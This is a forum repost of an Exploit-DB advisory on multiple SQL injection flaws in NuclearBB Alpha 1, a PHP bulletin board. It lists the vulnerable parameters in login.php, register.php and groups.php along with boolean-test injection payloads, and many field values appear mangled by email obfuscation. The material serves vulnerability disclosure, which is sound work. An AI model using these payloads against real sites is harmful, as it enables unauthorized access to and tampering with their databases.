Exploit NuclearBB Alpha 1 - Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29868
Проверка EDB
  1. Пройдено
Автор
JOHN MARTINELLI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2007-04-18
NuclearBB Alpha 1 - Multiple SQL Injections
Код:
source: https://www.securityfocus.com/bid/23555/info

NuclearBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

These issues affect NuclearBB Alpha 1; other versions may also be affected. 

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

[email protected]
[email protected]
pass1=passwordxyz
pass2=passwordxyz
[email protected]"+and+"1"="0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
[email protected]
[email protected]
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

[email protected]
[email protected]+and+1=0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over&register_submit=Register
 
Источник
www.exploit-db.com

Похожие темы